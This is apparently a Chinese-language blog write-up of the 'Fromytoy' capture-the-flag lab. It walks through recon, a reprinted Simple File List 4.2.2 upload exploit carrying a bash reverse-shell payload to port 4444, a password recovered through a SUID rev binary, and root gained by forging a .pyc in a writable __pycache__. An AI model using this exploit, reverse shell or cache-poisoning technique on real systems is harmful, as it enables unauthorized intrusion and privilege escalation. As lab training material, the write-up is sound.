Mazesec_Fromytoy

靶机来源：QQ群-660930334

难度：Easy

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-02 16:31 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00072s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00060s latency).
MAC Address: 08:00:27:48:23:C1 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.67
Host is up (0.00053s latency).
MAC Address: 08:00:27:F9:7B:3D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.54 seconds

靶机IP：192.168.2.67

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.67
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-02 16:31 +0800
Nmap scan report for 192.168.2.67
Host is up (0.0022s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3000/tcp open  ppp
MAC Address: 08:00:27:F9:7B:3D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 8.93 seconds

开放端口：22、80、3000

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80,3000 192.168.2.67
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-02 16:32 +0800
Nmap scan report for 192.168.2.67
Host is up (0.00082s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.62 (Debian)
3000/tcp open  http    Apache httpd 2.4.51 ((Debian))
|_http-title: VOCALOID NEXUS &#8211; The Cyber-Digital Soul Archive
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-generator: WordPress 6.9
|_http-server-header: Apache/2.4.51 (Debian)
MAC Address: 08:00:27:F9:7B:3D (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.56 seconds

3.udp扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.67                         
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-02 16:33 +0800
Nmap scan report for 192.168.2.67
Host is up (0.00074s latency).
All 100 scanned ports on 192.168.2.67 are in ignored states.
Not shown: 60 closed udp ports (port-unreach), 40 open|filtered udp ports (no-response)
MAC Address: 08:00:27:F9:7B:3D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 60.21 seconds

二、WEB渗透

1、HTTP 服务

访问80端口，没发现有用的信息

1
2
3

┌──(root㉿kali)-[~/miaosec]
└─# curl http://192.168.2.67
index

2、目录扫描

┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.67 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,bak
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.67
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8.2
[+] Extensions:              txt,bak,php,html,js
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html           (Status: 200) [Size: 6]
server-status        (Status: 403) [Size: 277]

三、Simple File List

访问3000端口，发现cms是wordpress 使用wpscan进行扫描

┌──(root㉿kali)-[~/miaosec]
└─# wpscan --url http://192.168.2.67:3000 --api-token Jrh7ozpao7LtkyqVZwMeXCKeqJN0zHplyeG8SaQU124 -e u,vp
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | _ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.28
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.2.67:3000/ [192.168.2.67]
[+] Started: Tue Feb  3 10:35:45 2026

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.51 (Debian)
 |  - X-Powered-By: PHP/7.4.27
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://192.168.2.67:3000/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.2.67:3000/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.2.67:3000/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.2.67:3000/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.9 identified (Latest, released on 2025-12-02).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.2.67:3000/feed/, <generator>https://wordpress.org/?v=6.9</generator>
 |  - http://192.168.2.67:3000/comments/feed/, <generator>https://wordpress.org/?v=6.9</generator>

[+] WordPress theme in use: twentytwentyone
 | Location: http://192.168.2.67:3000/wp-content/themes/twentytwentyone/
 | Last Updated: 2025-12-03T00:00:00.000Z
 | Readme: http://192.168.2.67:3000/wp-content/themes/twentytwentyone/readme.txt
 | [!] The version is out of date, the latest version is 2.7
 | Style URL: http://192.168.2.67:3000/wp-content/themes/twentytwentyone/style.css?ver=1.4
 | Style Name: Twenty Twenty-One
 | Style URI: https://wordpress.org/themes/twentytwentyone/
 | Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.2.67:3000/wp-content/themes/twentytwentyone/style.css?ver=1.4, Match: 'Version: 1.4'

[+] Enumerating Vulnerable Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] simple-file-list
 | Location: http://192.168.2.67:3000/wp-content/plugins/simple-file-list/
 | Last Updated: 2026-01-29T20:30:00.000Z
 | [!] The version is out of date, the latest version is 6.1.18
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | [!] 12 vulnerabilities identified:
 |
 | [!] Title: Simple File List < 4.2.3 - Unauthenticated Arbitrary File Upload RCE
 |     Fixed in: 4.2.3
 |     References:
 |      - https://wpscan.com/vulnerability/365da9c5-a8d0-45f6-863c-1b1926ffd574
 |      - https://simplefilelist.com/
 |      - https://plugins.trac.wordpress.org/changeset/2286920/simple-file-list
 |      - https://packetstormsecurity.com/files/160221/
 |
 | [!] Title: Simple File List < 4.2.8 - Authenticated Arbitrary File Deletion
 |     Fixed in: 4.2.8
 |     References:
 |      - https://wpscan.com/vulnerability/422360b9-4c70-4fd9-9833-375f1294bd7a
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12832
 |      - https://ctulhu.me/2020/05/16/cve-2020-12832/
 |
 | [!] Title: Simple File List < 4.4.12 - Reflected Cross-Site Scripting
 |     Fixed in: 4.4.12
 |     References:
 |      - https://wpscan.com/vulnerability/2e829bbe-1843-496d-a852-4150fa6d1f7a
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3062
 |
 | [!] Title: Simple File List < 4.4.13 - Page Creation via CSRF
 |     Fixed in: 4.4.13
 |     References:
 |      - https://wpscan.com/vulnerability/80d475ca-b475-4789-8eef-9c4d880853b7
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3208
 |
 | [!] Title: Simple File List < 4.4.12 - Admin+ Stored Cross-Site Scripting
 |     Fixed in: 4.4.12
 |     References:
 |      - https://wpscan.com/vulnerability/b57272ea-9a8a-482a-bbaa-5f202ca5b9aa
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3207
 |
 | [!] Title: Simple File List < 6.0.10 - Admin+ Stored XSS
 |     Fixed in: 6.0.10
 |     References:
 |      - https://wpscan.com/vulnerability/13621b13-8d31-4214-a665-cb15981f3ec1
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1025
 |
 | [!] Title: Simple File List < 6.1.10 - Admin+ Stored XSS
 |     Fixed in: 6.1.10
 |     References:
 |      - https://wpscan.com/vulnerability/3436f5d4-f620-49f1-9e90-37883a8ad0dc
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39924
 |      - https://patchstack.com/database/vulnerability/simple-file-list/wordpress-simple-file-list-plugin-6-1-9-cross-site-scripting-xss-vulnerability
 |
 | [!] Title: Simple File List < 6.1.10 - Unauthenticated Arbitrary File Deletion
 |     Fixed in: 6.1.10
 |     References:
 |      - https://wpscan.com/vulnerability/c2121b69-2aed-4db4-8191-448deceab091
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44227
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/7eada9b7-8d53-4e95-858e-aa706f74b2a1
 |
 | [!] Title: Simple File List < 6.1.13 - Reflected Cross-Site Scripting
 |     Fixed in: 6.1.13
 |     References:
 |      - https://wpscan.com/vulnerability/9ee74a0f-83ff-4c15-a114-f8f6baab8bf5
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-10146
 |
 | [!] Title: Simple File List < 6.1.14 - Missing Authorization to Unauthenticated Minor Settings Update
 |     Fixed in: 6.1.14
 |     References:
 |      - https://wpscan.com/vulnerability/aedab3a9-cf83-4f69-a282-7d1b07176e95
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-47450
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/207eedfc-8b42-49be-be7a-98da38ad7ee6
 |
 | [!] Title: Simple File List < 6.1.15 - Unauthenticated Arbitrary File Download
 |     Fixed in: 6.1.15
 |     References:
 |      - https://wpscan.com/vulnerability/45956bfe-5c31-4e6b-b9a8-bd300cb82569
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-54021
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/dcbb6a4c-120f-43d1-8ec9-dac52186d81a
 |
 | [!] Title: Simple File List <= 6.1.16 - Missing Authorization
 |     References:
 |      - https://wpscan.com/vulnerability/25b593ff-9e7e-43e8-b630-9fdd6f3548eb
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68591
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/8939cad2-f9fc-45aa-97d1-9a1a2a59bf94
 |
 | Version: 4.2.2 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.2.67:3000/wp-content/plugins/simple-file-list/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.2.67:3000/wp-content/plugins/simple-file-list/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=======================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] VOCALOID NEXUS
 | Found By: Oembed API - Author Name (Aggressive Detection)
 |  - http://192.168.2.67:3000/wp-json/oembed/1.0/embed?url=http://192.168.2.67:3000/&format=json

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 4
 | Requests Remaining: 21

[+] Finished: Tue Feb  3 10:36:02 2026
[+] Requests Done: 65
[+] Cached Requests: 9
[+] Data Sent: 16.72 KB
[+] Data Received: 510.302 KB
[+] Memory used: 238.77 MB
[+] Elapsed time: 00:00:17

发现存在Simple File List文件上传漏洞

1	`https://www.exploit-db.com/exploits/48979`

exp

#!/usr/bin/python
# -*- coding: utf-8 -*-
# Exploit Title: Wordpress Plugin Simple File List 4.2.2 - Arbitrary File Upload
# Date: 2020-11-01
# Exploit Author: H4rk3nz0 based off exploit by coiffeur
# Original Exploit: https://www.exploit-db.com/exploits/48349
# Vendor Homepage: https://simplefilelist.com/
# Software Link: https://wordpress.org/plugins/simple-file-list/ 
# Version: Wordpress v5.4 Simple File List v4.2.2 

import requests
import random
import hashlib
import sys
import os
import urllib3
urllib3.disable_warnings()

dir_path = '/wp-content/uploads/simple-file-list/'
upload_path = '/wp-content/plugins/simple-file-list/ee-upload-engine.php'
move_path = '/wp-content/plugins/simple-file-list/ee-file-engine.php'

def usage():
    banner = """
NAME: Wordpress v5.4 Simple File List v4.2.2, pre-auth RCE
SYNOPSIS: python wp_simple_file_list_4.2.2.py <URL>
AUTHOR: coiffeur
    """
    print(banner)

def generate():
    filename = f'{random.randint(0, 10000)}.png'
    password = hashlib.md5(bytearray(random.getrandbits(8)
                                     for _ in range(20))).hexdigest()
    with open(f'{filename}', 'wb') as f:
        payload = '<?php passthru("bash -i >& /dev/tcp/192.168.1.1/4444 0>&1"); ?>'
        f.write(payload.encode())
    print(f'[ ] File {filename} generated with password: {password}')
    return filename, password

def upload(url, filename):
    files = {'file': (filename, open(filename, 'rb'), 'image/png')}
    datas = {'eeSFL_ID': 1, 'eeSFL_FileUploadDir': dir_path,
             'eeSFL_Timestamp': 1587258885, 'eeSFL_Token': 'ba288252629a5399759b6fde1e205bc2'}
    r = requests.post(url=f'{url}{upload_path}',
                      data=datas, files=files, verify=False)
    r = requests.get(url=f'{url}{dir_path}{filename}', verify=False)
    if r.status_code == 200:
        print(f'[ ] File uploaded at {url}{dir_path}{filename}')
        os.remove(filename)
    else:
        print(f'[*] Failed to upload {filename}')
        exit(-1)
    return filename

def move(url, filename):
    new_filename = f'{filename.split(".")[0]}.php'
    headers = {'Referer': f'{url}/wp-admin/admin.php?page=ee-simple-file-list&tab=file_list&eeListID=1',
               'X-Requested-With': 'XMLHttpRequest'}
    datas = {'eeSFL_ID': 1, 'eeFileOld': filename,
             'eeListFolder': '/', 'eeFileAction': f'Rename|{new_filename}'}
    r = requests.post(url=f'{url}{move_path}',
                      data=datas, headers=headers, verify=False)
    if r.status_code == 200:
        print(f'[ ] File moved to {url}{dir_path}{new_filename}')
    else:
        print(f'[*] Failed to move {filename}')
        exit(-1)
    return new_filename

def main(url):
    file_to_upload, password = generate()
    uploaded_file = upload(url, file_to_upload)
    moved_file = move(url, uploaded_file)
    if moved_file:
        print(f'[+] Exploit seem to work.\n[*] Confirmning ...')
    datas = {'password': password, 'cmd': 'phpinfo();'}
    r = requests.post(url=f'{url}{dir_path}{moved_file}',
                      data=datas, verify=False)
    if r.status_code == 200 and r.text.find('php') != -1:
        print('[+] Exploit work !')
        print(f'\tURL: {url}{dir_path}{moved_file}')
        print(f'\tPassword: {password}')

if __name__ == "__main__":
    if (len(sys.argv) < 2):
        usage()
        exit(-1)
    main(sys.argv[1])

进行利用

┌──(root㉿kali)-[~/miaosec/Nukem-PG-exploit]
└─# python exploit.py "192.168.2.67:3000"
[+] File renamed to reverse.png
[+] File uploaded at http://192.168.2.67:3000/wp-content/uploads/simple-file-list/reverse.png
[+] File moved to http://192.168.2.67:3000/wp-content/uploads/simple-file-list/reverse.php
[^-^] Exploit seems to have worked...
        URL: http://192.168.2.67:3000/wp-content/uploads/simple-file-list/reverse.php

成功获取到shell

┌──(root㉿kali)-[~/miaosec]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.67] 39374
Linux 949d50994487 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64 GNU/Linux
 09:04:35 up 35 min,  0 users,  load average: 0.05, 0.27, 0.23
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

四、权限提升

1、获取miku权限

发现是docker环境

$ ls -la /
total 88
drwxr-xr-x   1 root root 4096 Jan 20 03:33 .
drwxr-xr-x   1 root root 4096 Jan 20 03:33 ..
-rwxr-xr-x   1 root root    0 Jan 20 03:33 .dockerenv
drwxr-xr-x   1 root root 4096 Dec 21  2021 bin
drwxr-xr-x   2 root root 4096 Dec 11  2021 boot
....

查看具有suid权限的文件

$ find / -type f -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/passwd
/usr/local/lib/.sys_log_rotator
/bin/mount
/bin/su
/bin/umount

找到一个/usr/local/lib/.sys_log_rotator

$ /usr/local/lib/.sys_log_rotator -h
Usage: .sys_log_rotator [options] [file ...]

Reverse lines characterwise.

Options:
 -h, --help     display this help
 -V, --version  display version

For more details see rev(1).

该文件就是rev，功能是一样的

1	`$ diff /usr/bin/rev /usr/local/lib/.sys_log_rotator`

查看用户miku可读写的文件

1
2
3

$ find / -user miku 2>/dev/null
/usr/local/lib/.sys_log_rotator
/var/www/html/wp-content/uploads/server_backup_info.txt

读取文件server_backup_info.txt

$ /usr/local/lib/.sys_log_rotator /var/www/html/wp-content/uploads/server_backup_info.txt
01-10-5202 :etaD pukcaB
noitacifirev gnidneP :sutatS
:nimdasyS rof etoN
.'yotymorf' tsoh rof slaitnederc yraropmet ot detreveR .deliaf noitator yek HSS ehT
ukim :resU
93_uk1M_di0lac0V :drowssaP

noitacifirev retfa elif siht eteled esaelP :TRELA YTIRUCES

成功找到凭证：miku:V0cal0id_M1ku_39

┌──(root㉿kali)-[~]
└─# ssh miku@192.168.2.67
miku@fromytoy:~$ id
uid=1000(miku) gid=1000(miku) groups=1000(miku)

2、获取root权限

查看sudo -l

miku@fromytoy:~$ sudo -l
Matching Defaults entries for miku on fromytoy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User miku may run the following commands on fromytoy:
    (ALL) NOPASSWD: /usr/bin/python3 /usr/local/lib/python_scripts/cleanup_task.py

脚本分析：

miku@fromytoy:~$ cat /usr/local/lib/python_scripts/cleanup_task.py
#!/usr/bin/env python3
import sys
import os
import system_utils 

def main():
    print("[*] Starting system cleanup...")
    if os.geteuid() != 0:
        print("[-] Error: This script must be run as root.")
        sys.exit(1)
    

    system_utils.check_disk_space()
    print("[+] Cleanup completed successfully.")

if __name__ == "__main__":
    main()

调用system_utils模块中的check_disk_space函数检查磁盘使用情况

在/usr/local/lib/python_scripts/目录下，发现system_utils.py模块

miku@fromytoy:~$ find / -name 'system_utils' 2>/dev/null
miku@fromytoy:~$ find / -name '*system_utils*' 2>/dev/null
/usr/local/lib/python_scripts/__pycache__/system_utils.cpython-39.pyc
/usr/local/lib/python_scripts/system_utils.py

查看模块内容：这个模块调用了os.system执行shell命令df-h查看磁盘使用情况

miku@fromytoy:~$ cat /usr/local/lib/python_scripts/system_utils.py
import os
def check_disk_space():
    print("[*] Checking disk usage...")
    os.system("df -h")

_pycache_投毒查看可写目录

miku@fromytoy:~$ find / -type d -writable 2>/dev/null | grep -Ev '^/run|^/proc|^/sys'
/dev/mqueue
/dev/shm
/usr/local/lib/python_scripts/__pycache__
/tmp
/tmp/.Test-unix
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/.XIM-unix
/tmp/.X11-unix
/home/miku
/var/tmp
/var/lib/php/sessions

/usr/local/lib/python_scripts/__pycache__是可写的

miku@fromytoy:~$ ls -la /usr/local/lib/python_scripts/           
total 20
drwxr-xr-x 3 root root 4096 Jan 19 22:50 .
drwxr-xr-x 5 root root 4096 Jan 19 22:40 ..
drwxrwxrwx 2 root root 4096 Jan 20 00:35 __pycache__
-rwxr-xr-x 1 root root  359 Jan 19 22:50 cleanup_task.py
-rw-r--r-- 1 root root   97 Jan 19 22:41 system_utils.py

攻击原理： Python在导入模块时会优先使用pycache目录下的.pyc文件，并且会验证.pyc文件中的时间戳和源文件.py的时间戳是否一致，以及文件大小。如果一致，则使用缓存，否则重新编译在pyc文件的header部分，大小为16字节，包含魔数、时间戳和文件大小等信息。

这个目录是可写的，所以可以删除掉root用户编译的字节码pyc文件，在tmp目录下编译生成恶意的system_utils.py文件，编译后移动到/usr/local/lib/python_scripts/_pycache_/目录下覆盖原有的 pyc文件，注意时间戳的问题

编写恶意python文件

miku@fromytoy:/tmp$ nano pwn.py 
import os

def check_disk_space():
    os.system("cp /bin/bash /tmp/bash")
    os.system("chmod +s /tmp/bash")

编译文件

1	`miku@fromytoy:/tmp$ python3 /tmp/exp.py`

删除原有的pyc文件

1 2	`miku@fromytoy:~$ rm -rf /usr/local/lib/python_scripts/__pycache__/system_utils.cpython-39.pyc miku@fromytoy:~$ rm -rf /usr/local/lib/python_scripts/__pycache__/cleanup_task.cpython-39.pyc`

编写修正脚本头部元数据的 exp.py 文件

miku@fromytoy:/tmp$ nano exp.py 
import struct
import os

source_file = "/usr/local/lib/python_scripts/system_utils.py"
target_pyc = "/tmp/__pycache__/pwn.cpython-39.pyc"
output_pyc = "/usr/local/lib/python_scripts/__pycache__/system_utils.cpython-39.pyc"

# 1. 获取 root 源文件的元数据
stat = os.stat(source_file)
mtime = int(stat.st_mtime)
size = stat.st_size & 0xFFFFFFFF

# 2. 读取你编译好的恶意 pyc
with open(target_pyc, "rb") as f:
    data = bytearray(f.read())

# 3. 修正头部元数据 (针对 Python 3.7+)
# 偏移 8-11: 时间戳 (Little-endian)
data[8:12] = struct.pack("<I", mtime)
# 偏移 12-15: 文件大小
data[12:16] = struct.pack("<I", size)

# 4. 写入目标位置
with open(output_pyc, "wb") as f:
    f.write(data)

print(f"[+] Successfully forged {output_pyc}")

执行 exp.py文件，生成修正后的 pyc 文件并移动到 /usr/local/lib/python_scripts/__pycache__/目录下覆盖原有的pyc文件

miku@fromytoy:/tmp$ python3 /tmp/exp.py
[+] Successfully forged /usr/local/lib/python_scripts/__pycache__/system_utils.cpython-39.pyc

miku@fromytoy:/tmp$ mv __pycache__/ /usr/local/lib/python_scripts/__pycache__/

执行sudo，进行提取

miku@fromytoy:/tmp$ sudo /usr/bin/python3 /usr/local/lib/python_scripts/cleanup_task.py
[*] Starting system cleanup...
[+] Cleanup completed successfully.
miku@fromytoy:/tmp$ ls -la /tmp
total 1192
drwxrwxrwt 10 root root    4096 Feb  3 22:20 .
drwxr-xr-x 18 root root    4096 Mar 18  2025 ..
drwxrwxrwt  2 root root    4096 Feb  3 21:24 .ICE-unix
drwxrwxrwt  2 root root    4096 Feb  3 21:24 .Test-unix
drwxrwxrwt  2 root root    4096 Feb  3 21:24 .X11-unix
drwxrwxrwt  2 root root    4096 Feb  3 21:24 .XIM-unix
drwxrwxrwt  2 root root    4096 Feb  3 21:24 .font-unix
-rwsr-sr-x  1 root root 1168776 Feb  3 22:20 bash
-rw-r--r--  1 miku miku     774 Feb  3 22:19 exp.py
-rw-r--r--  1 miku miku     111 Feb  3 22:19 pwn.py
drwx------  3 root root    4096 Feb  3 21:24 systemd-private-55f31a80f4b8437c83a2a1fe00361dc6-apache2.service-KndNHh
drwx------  3 root root    4096 Feb  3 21:24 systemd-private-55f31a80f4b8437c83a2a1fe00361dc6-systemd-logind.service-aWzEdg
drwx------  3 root root    4096 Feb  3 21:24 systemd-private-55f31a80f4b8437c83a2a1fe00361dc6-systemd-timesyncd.service-g1GcSi

成功获取到root权限

1
2
3

miku@fromytoy:/tmp$ LC_ALL=C /tmp/bash -p
bash-5.0# id
uid=1000(miku) gid=1000(miku) euid=0(root) egid=0(root) groups=0(root),1000(miku)

五、查看FALG

bash-5.0# cat /root/root.txt /home/miku/user.txt 
a6c7cf996c275fa5afe6e47bc6f5c79e



Good morning, and in case I don't see you, Good afternoon, Good evening, And good night
26d1ebd4ec8c55cc69f190d0d37f6dac


願うことさえ
許されない世界なのかな

bash-5.0#

Maze-sec

#Wordpress #Simple File List #Suid_rev #pycache投毒

Mazesec_Fromytoy

http://miao-sec.github.io/Maze-sec/Mazesec-Fromytoy/

作者

Miao

发布于

2026年2月4日

许可协议

BY-MIAO

Mazesec_115final 上一篇

Vlx_Agent 下一篇